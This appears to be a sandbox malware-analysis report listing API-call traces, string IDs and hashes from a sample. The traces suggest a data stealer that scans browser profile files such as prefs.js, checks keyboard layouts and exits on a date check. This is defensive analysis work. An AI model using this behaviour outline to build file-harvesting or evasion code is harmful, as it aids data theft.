                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                        • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID: P2Wu$prefs.js$1Wu
                                                        • API String ID: 3334442632-3908436908
                                                        • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                        • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                        • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                        • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                        • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID: P2Wu$1Wu
                                                        • API String ID: 3334442632-3706712411
                                                        • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                        • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                        • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                        • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                        APIs
                                                        • wsprintfA.USER32 ref: 02D0412A
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 02D04141
                                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 02D0416F
                                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02D04185
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02D042D3
                                                        • FindClose.KERNEL32(000000FF), ref: 02D042E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                        • Instruction ID: 93c3cb9d8bba122a3144c6774eaf9f8360d346c781ace02e65856d8fa0172821
                                                        • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                        • Instruction Fuzzy Hash: 475161B5900218BBCB24EBB0DD84FEA737DFB58300F40458DA64992190DB759B85CFA5
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                        • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                        • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                        • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                        • String ID: P2Wu$\*.*$1Wu
                                                        • API String ID: 1415058207-3890502324
                                                        • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                        • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                        • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                        • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                        • String ID: P2Wu$\*.*$1Wu$@
                                                        • API String ID: 433455689-1269587431
                                                        • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                        • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                        • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                        • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                        APIs
                                                        • wsprintfA.USER32 ref: 02CFEFA5
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 02CFEFBC
                                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 02CFF012
                                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 02CFF028
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02CFF515
                                                        • FindClose.KERNEL32(000000FF), ref: 02CFF52A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                        • Instruction ID: 86bae3db64f9c8aec2472762d5122bb5bad92b5b1e3e9851d575e60eaade2369
                                                        • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                        • Instruction Fuzzy Hash: 43E1AB729113289ADB58EB60DD91FEE733AEF54304F4041DDA60A625E1EE306F89CF61
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 02CFDD52
                                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 02CFDD9A
                                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 02CFDDB0
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02CFE033
                                                        • FindClose.KERNEL32(000000FF), ref: 02CFE045
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                        • Instruction ID: 3c5e619a82c04d06c4676ad7a22dea86b62ce9219416a0e78ef5f7491980e61e
                                                        • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                        • Instruction Fuzzy Hash: 9F9154729003149BCB54FBB0ED95EED737AEF95300F00465DA64A562D0EE34AB588FA1
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 02CFF985
                                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 02CFF9D6
                                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 02CFF9EC
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02CFFD18
                                                        • FindClose.KERNEL32(000000FF), ref: 02CFFD2A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                        • Instruction ID: 3b7e912467ecad77baf701ce917fe86ee4ced5330f760ccdf19e3eff3e1d4788
                                                        • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                        • Instruction Fuzzy Hash: A8B10E71A002189BCB64EB60DD95FEE737AEF95304F40819D960A562E0EF306F49CFA1
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 02CF1B8A
                                                        • StrCmpCA.SHLWAPI(?,0042526C), ref: 02CF1BDA
                                                        • StrCmpCA.SHLWAPI(?,00425314), ref: 02CF1BF0
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02CF1FA7
                                                        • DeleteFileA.KERNEL32(00000000), ref: 02CF2031
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02CF2087
                                                        • FindClose.KERNEL32(000000FF), ref: 02CF2099
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 1415058207-0
                                                        • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                        • Instruction ID: 9f622a6c8e21f59902ea480ea613326190f21fe973e7fd58e6397455b212ea89
                                                        • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                        • Instruction Fuzzy Hash: A012A571914318AACB59EB60DD94FEDB37AEF54304F40419DA60A661E0EF746F88CFA0
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 02CFE0C5
                                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 02CFE115
                                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 02CFE12B
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02CFE647
                                                        • FindClose.KERNEL32(000000FF), ref: 02CFE659
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2325840235-0
                                                        • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                        • Instruction ID: 6aa8e2020610d96963847d0c95bf1131f22ef5a8c0940195a4b8e9f7740c9cc5
                                                        • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                        • Instruction Fuzzy Hash: 4AF17C759143289ACB19EB61DD94FEE733AEF55304F4041DEA24A621E0EF346F89CE60
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                        • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                        • String ID: /
                                                        • API String ID: 3090951853-4001269591
                                                        • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                        • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                        • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                        • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                        APIs
                                                        • memset.MSVCRT ref: 0040C853
                                                        • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02EB5CB8), ref: 0040C871
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                        • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                        • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                        • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                        • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 1498829745-0
                                                        • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                        • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                        • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                        • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                        APIs
                                                        • memset.MSVCRT ref: 02CFCABA
                                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02CFCAD8
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02CFCAE3
                                                        • memcpy.MSVCRT(?,?,?), ref: 02CFCB79
                                                        • lstrcat.KERNEL32(?,00420B46), ref: 02CFCBAA
                                                        • lstrcat.KERNEL32(?,00420B47), ref: 02CFCBBE
                                                        • lstrcat.KERNEL32(?,00420B4E), ref: 02CFCBDF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 1498829745-0
                                                        • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                        • Instruction ID: 441165e652a156a106e8ed6ea0c5844c4d5c30c2be201e32fa51af6b85bea90b
                                                        • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                        • Instruction Fuzzy Hash: 56415E78A4421EEFDB50DFD0DC88BEEBBB9BB44304F1045A9E609A6280D7745B84CF91
                                                        APIs
                                                        • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,02EB5D28,?,0042110C,?,00000000,?), ref: 0041696C
                                                        • sscanf.NTDLL ref: 00416999
                                                        • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,02EB5D28,?,0042110C), ref: 004169B2
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02EB5D28,?,0042110C), ref: 004169C0
                                                        • ExitProcess.KERNEL32 ref: 004169DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$System$File$ExitProcesssscanf
                                                        • String ID: B
                                                        • API String ID: 2533653975-2248957098
                                                        • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                        • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                        • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                        • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                        APIs
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
